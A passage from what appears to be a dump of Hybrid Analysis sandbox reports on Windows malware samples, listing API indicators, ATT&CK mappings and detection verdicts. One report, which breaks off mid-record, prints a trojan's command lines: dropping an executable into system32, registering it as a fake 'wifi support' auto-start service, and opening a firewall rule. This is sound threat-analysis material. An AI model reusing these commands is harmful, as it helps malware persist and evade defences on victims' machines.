\"GetStartupInfoW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"SetFilePointerEx\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"SetEvent\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"InitializeSListHead\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"SetStdHandle\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"RaiseException\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"TlsFree\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FindNextFileW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetACP\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FindFirstFileExW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"DecodePointer\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetModuleHandleExW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"IsValidCodePage\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"CreateFileW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FindClose\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"TlsGetValue\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetFileType\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"TlsSetValue\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FlsAlloc\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FlsFree\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FlsGetValue\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FlsSetValue\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"InitializeCriticalSectionEx\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"LCMapStringEx\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"LocaleNameToLCID\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has an writable section named \".data\"\n \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xacb000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-30", "type": 8, "relevance": 3, "name": "Contains ability to read the PEB (Process Environment Block) structure", "description": "\"sample.bin\" can read PEB structure (dword ptr fs:[00000030h]) (Offset: 10161)", "origin": "Binary File", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"IsDebuggerPresent\" (Indicator: \"IsDebuggerPresent\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"SetUnhandledExceptionFilter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoW\" (Indicator: \"GetStartupInfo\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"FindFirstFileExW\" (Indicator: \"FindFirstFile\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"CorExitProcess\" (Indicator: \"ExitProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" claimed CRC 231695 while the actual is CRC 7285000", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "GetModuleFileNameW\n IsDebuggerPresent\n GetCommandLineW\n UnhandledExceptionFilter\n LoadLibraryExW\n GetStartupInfoW\n GetCommandLineA\n GetProcAddress\n FindNextFileW\n WriteFile\n FindFirstFileExW\n GetModuleHandleW\n TerminateProcess\n GetModuleHandleExW\n CreateFileW\n VirtualProtect", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has section name .text with entropy \"6.63010280368\"\n \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has section name .text with entropy \"7.97285529131\"\n \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has section name .reloc with entropy \"6.22154880094\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4
https://hybrid-analysis.com/sample/952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4
Hybrid Analysis - Um_unhooking
{"size": 14679552, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4", "sha256": "952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 7, "total_processes": 9, "total_signatures": 236, "extracted_files": [{"name": "rtmxemaq.exe", "file_path": "%TEMP%\\rtmxemaq.exe", "file_size": 5242368, "sha256": "118acd871c5805f526899b91433db7472af772ae5b3101a1409743f337141f02", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 5928)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rtmxemaq.exe.67B73BE7.bin", "file_size": 13131264, "sha256": "9efd1ee1100f63cbd8d7d28591dcb02ad1d4fbdcff5095104370310d6a3fc4cc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00006024", "name": "952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe", "normalized_path": "C:\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe", "sha256": "952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4", "av_label": "Trojan.BrsecmonE", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00006020", "parentuid": "00000000-00006024", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\xtblsmos\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005928", "parentuid": "00000000-00006024", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\rtmxemaq.exe\" %WINDIR%\\system32\\xtblsmos\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005872", "parentuid": "00000000-00006024", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create xtblsmos binPath= \"%WINDIR%\\system32\\xtblsmos\\rtmxemaq.exe /d\\\"C:\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004284", "parentuid": "00000000-00006024", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description xtblsmos \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002116", "parentuid": "00000000-00006024", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start xtblsmos", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002212", "parentuid": "00000000-00006024", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00003744", "name": "rtmxemaq.exe", "normalized_path": "%WINDIR%\\system32\\xtblsmos\\rtmxemaq.exe", "command_line": "/d\"C:\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\"", "sha256": "9efd1ee1100f63cbd8d7d28591dcb02ad1d4fbdcff5095104370310d6a3fc4cc"}, {"uid": "00000000-00003660", "parentuid": "00000000-00003744", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 